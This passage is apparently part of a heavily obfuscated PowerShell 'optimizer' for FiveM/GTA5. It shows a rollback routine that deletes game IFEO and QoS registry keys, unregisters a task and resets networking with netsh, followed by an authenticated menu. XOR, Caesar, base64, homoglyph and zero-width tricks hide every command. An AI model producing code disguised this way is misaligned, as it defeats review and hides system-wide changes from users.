    $d6Oy = $($k5865='(aop[';$b=[byte[]](0x60,0x2A,0x23,0x3D,0x61,0x74,0x32,0x20,0x36,0x0F,0x7F,0x20,0x3D,0x35,0x07,0x65,0x08,0x0C,0x02,0x34,0x5B,0x0E,0x09,0x04,0x07,0x7F,0x08,0x01,0x14,0x34,0x5F,0x12,0x4F,0x3E,0x0F,0x74,0x22,0x1A,0x02,0x29,0x4D,0x0F,0x1B,0x26,0x3E,0x5A,0x12,0x06,0x1F,0x35,0x74,0x2C,0x1A,0x1C,0x2F,0x41,0x0C,0x0A,0x14,0x32,0x49,0x3D,0x3C,0x09,0x28,0x5C,0x04,0x02,0x20,0x29,0x47,0x07,0x06,0x1C,0x3E,0x74,0x35,0x0E,0x03,0x30,0x5B,0x3D,0x28,0x11,0x36,0x4D,0x12);$kb=[System.Text.Encoding]::UTF8.GetBytes($k5865);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))
    if (te`st-patH $d6Oy) {
        &((-join('neW','-I'))+([string]::Format('{0}{1}{2}{3}','T','EmprO','PE','RTy'))) -pATh $D6oy -nAMe 'GРU Рrіоrіtу' -VAlUE (2 * 4) -PRopErTYtype DworD -ForCE | &($(-join('uAZ-TAR'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}}))+'l')
        neW-ITEMpROPeRTy -PATh $d6Oy -nAme ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UHJpb3JpdHk='))) -vaLue (26 % 8) -pROperTytype DwoRd -foRCE | &($($k8718='RbnZ}';$b=[byte[]](0x1D,0x37,0x3A,0x77,0x13,0x07,0x2E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8718);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+$($k8526=190;$b=[byte[]](0xf2);-join($b|%{[char]($_-bxor$k8526)})))
        new-itEmPRopErtY -pATH $d6oy -nAmE $($k4930=93;$b=[byte[]](0x0e,0x3e,0x35,0x38,0x39,0x28,0x31,0x34,0x33,0x3a,0x7d,0x1e,0x3c,0x29,0x38,0x3a,0x32,0x2f,0x24);-join($b|%{[char]($_-bxor$k4930)})) -VaLUE ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TWVkaXVt'))) -propertyTYPE StRINg -FoRcE | &($(-join('nT'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+1)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+1)%26))}else{[char]$c}}))+('t-'+'n'+'U'+'l'+'l'))
        NeW-ItEmpROperTy -paTh $d6Oy -NAmE $($k7766='KijuKlT';$b=[byte[]](0x18,0x2F,0x23,0x3A,0x6B,0x3C,0x26,0x22,0x06,0x18,0x1C,0x3F,0x15);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7766);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -VAlUE (-join('N','o','r','mal')) -PrOpeRTytYpE StRING -foRCe | OUT-nUL`l
    }

    $Xodr = @($($k6625='6-USA>y?';$b=[byte[]](0x70,0x44,0x23,0x36,0x0C,0x10,0x1C,0x47,0x53);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6625);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})), 'F‌i​v‍e‍M‌_‌G‌T​A‌P‌r‍o​c​e‍s‌s‍.‌e​x‍e‍', $(-join('MpclT_i2699_NAHWyvjlzz.lel'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+19)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+19)%26))}else{[char]$c}})), ('F'+'iveM_b30'+'9'+'5'+'_GT'+'AP'+'rocess'+'.exe'), ([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}','F','iveM_','b3','25','8_G','TAPro','cess.','e','xe')), (-join('GTA5','.e','xe')))
    foreach ($Kexhj7 in $xOdr) {
        &($(-join('oBjlSB-fQ'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+3)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+3)%26))}else{[char]$c}}))+$($k3871=34;$b=[byte[]](0x67,0x6f);-join($b|%{[char]($_-bxor$k3871)}))) -Path (([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}{21}{22}{23}{24}{25}{26}','HK','LM:\','SOFTW','ARE\M','icros','of','t\','W','ind','ows ','NT','\Cur','ren','t','Ve','rsion','\','Image',' Fil','e Ex','ecu','tion ','O','pt','io','ns','\')) + $keXhJ7) -RecURSe -eRroRaCtion SILenTLyCOnTiNue | &('ОUТ-N'+$($k5959=4;$b=[byte[]](0x71,0x68,0x48);-join($b|%{[char]($_-bxor$k5959)})))
    }

$QGYR = 'k1zy7' * 5; $QGYR.Replace('m', 'a') | Out-Null; Remove-Variable QGYR -ErrorAction SilentlyContinue
    $kcMog = $($k6111=242;$b=[byte[]](0xba,0xb9,0xbe,0xbf,0xc8,0xae,0xa1,0xab,0xa1,0xa6,0xb7,0xbf,0xae,0xb1,0x87,0x80,0x80,0x97,0x9c,0x86,0xb1,0x9d,0x9c,0x86,0x80,0x9d,0x9e,0xa1,0x97,0x86,0xae,0xb1,0x9d,0x9c,0x86,0x80,0x9d,0x9e,0xae,0xa1,0x97,0x81,0x81,0x9b,0x9d,0x9c,0xd2,0xbf,0x93,0x9c,0x93,0x95,0x97,0x80,0xae,0xbf,0x97,0x9f,0x9d,0x80,0x8b,0xd2,0xbf,0x93,0x9c,0x93,0x95,0x97,0x9f,0x97,0x9c,0x86);-join($b|%{[char]($_-bxor$k6111)}))
    &($($k8837=189;$b=[byte[]](0xd3,0xf8);-join($b|%{[char]($_-bxor$k8837)}))+$(-join('j-VGRzCEbCRegL'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}}))) -Path $kcMOg -naMe ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TGFyZ2VTeXN0ZW1DYWNoZQ=='))) -VALuE (159 % 53) -proPErtYTypE DWord -ForcE | &("$([char]0x6F)$([char]0x55)"+"$([char]0x54)$([char]0x2D)$([char]0x4E)$([char]0x55)$([char]0x6C)$([char]0x4C)")
    NEW-ITeMproPErTy -PaTh $KCMOg -nAme ([string]::Format('{0}{1}{2}{3}','Sys','temP','ag','es')) -VAlUe (33 -bxor 33) -ProPERtYtype DwORD -FORCe | ouT`-NUlL

    nEw-iTEmproPeRTy -pAtH ([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}','HKCU',':\Sys','te','m','\Gam','eCon','fi','g','S','tor','e')) -NaMe $(-join('TnzrQIE_Ranoyrq'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}})) -ValuE (23 + -22) -PRopERTytyPE dword -FOrce | &('ОU'+$(-join('W-qxoO'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+23)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+23)%26))}else{[char]$c}})))

    if (&(('{0}{1}' -f 'te','st-')+"$([char]0x70)$([char]0x41)$([char]0x54)$([char]0x68)") ('HKLM:\S'+'OFTWARE\'+'Pol'+'icies'+'\Mi'+'croso'+'ft\W'+'in'+'dows\Qo'+'S')) {
        &($(-join('mzHJQ'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+5)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+5)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x45,0x2D,0x49,0x54,0x65,0x6D)))) -PAtH ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}' -f 'H','KLM',':\SOF','TW','ARE\P','ol','ici','es\M','ic','rosof','t\','W','indow','s\Q','oS') -RecUrsE -FoRce -ERroRactIOn SIlentLYcoNTinUE | oUT-nU`lL
    }

if ($false) {
    $processList = Get-Process | Sort-Object -Property WS -Descending | Select-Object -First 4; foreach ($p in $processList) { Write-Verbose "High Memory process: $($p.Name) - $($p.WS)" }
}
    # DEleTe aUTo-fLUsH BacKGround TASK
    uNregISter-S`chEdULEdTaSk -TASkname (-join([char]0x4C, [char]0x69, [char]0x74, [char]0x65, [char]0x50, [char]0x72, [char]0x6F, [char]0x5F, [char]0x4D, [char]0x65, [char]0x6D, [char]0x6F, [char]0x72, [char]0x79, [char]0x5F, [char]0x41, [char]0x75, [char]0x74, [char]0x6F, [char]0x46, [char]0x6C, [char]0x75, [char]0x73, [char]0x68)) -confirm:(!1) -ErroRaCtion sILEnTLyConTinuE | &(('{0}{1}{2}{3}{4}' -f 'O','U','t','-Nu','L')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TA=='))))

    poWERcfg /h On | &(('{0}' -f 'ou')+$(-join('w-QXoo'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+23)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+23)%26))}else{[char]$c}})))
    neTSH &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aQ==')))+$($k4557=162;$b=[byte[]](0xec,0xf6);-join($b|%{[char]($_-bxor$k4557)}))) IP &($($k1617='wd;Gv^5%)N&';$b=[byte[]](0x05);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1617);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+('{0}{1}' -f 'Es','eT')) | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('T3U=')))+'T​-‍n‍u‌L‌L‌')
    Netsh &((-join('wi','nSO','c'))+('{0}' -f 'k')) &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UkU=')))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('U0V0')))) | &(([string]::Format('{0}{1}{2}{3}{4}','ou','t','-','nU','L'))+$(-join('P'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+22)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+22)%26))}else{[char]$c}})))
    
    WRITe-HosT ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}' -f '`','`n[+','] RO','LLBA','CK',' R','UN C','OMPLE','TE: F','actor','y def','a','ult','s res','tor','ed','.') -FoRegrounDCOlOr gREEN
    &($(-join('Tgcf-'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}}))+('{0}{1}{2}' -f 'H','O','ST')) $(-join('``dFhuii Udjuh je hujkhd je Cudk...'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+10)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+10)%26))}else{[char]$c}}))
}

# --- rUNTIME eNTRY boOTStraPPER ---
$qhAfQ = &(('{0}{1}' -f 'SHOw-','AUTH')+$(-join('Hrgttc'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+11)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+11)%26))}else{[char]$c}})))
if ($qHAFq) {
    do {
        sHoW-wELCo`MEheadeR
		WritE-hosT ''
        $eLg2fENs = &($(-join('Qdzc-'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+1)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+1)%26))}else{[char]$c}}))+('{0}{1}' -f 'HOS','t')) ('S‌e‍l‌e‍c​t​ ​e‍x​e‌c‌u‍t‍i‍o​n‌ ‌p‌a​t‍h‍ ‌(‍' + $(-85 -bxor -86) + '-' + $(-88 -bxor -84) + ')‍')
        switch ($eLg2FEns) {
            ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('MQ=='))) { gLoBAL-oPtimIZe }
            ('{0}' -f '2') { GAME-QOsPOliCY }
            (-join([char]0x33)) { Global-rOLLBAck }
            '4' { &($(-join('ytkv'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}}))+$(-join('R-Ubfg'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}}))) ([System.Text.Encoding]::UTF8.GetString([byte[]](0x60,0x60,0x6E,0x45,0x78,0x69,0x74,0x69,0x6E,0x67,0x20,0x53,0x75,0x69,0x74,0x65,0x2E,0x20,0x47,0x47,0x2C,0x20,0x48,0x61,0x76,0x65,0x20,0x46,0x75,0x6E,0x21,0x20))); break }
            &(('DE'+'f')+([string]::Format('{0}{1}','au','lT'))) { &('w‍R‍I‌T‍E​'+'-‌h‌O​S​T‌') $(-join('Ydlqbyt fqhqcujuh jqhwuj. Jho qwqyd.'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+10)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+10)%26))}else{[char]$c}})) -fOregrOUNDCOlOr RED; &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('U3RBcnQ=')))+$(-join('-eXQQb'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}}))) -SecOnDs (-35 / -35) }
        }
    } while ($elg2FenS -ne "$([char]0x34)")
}
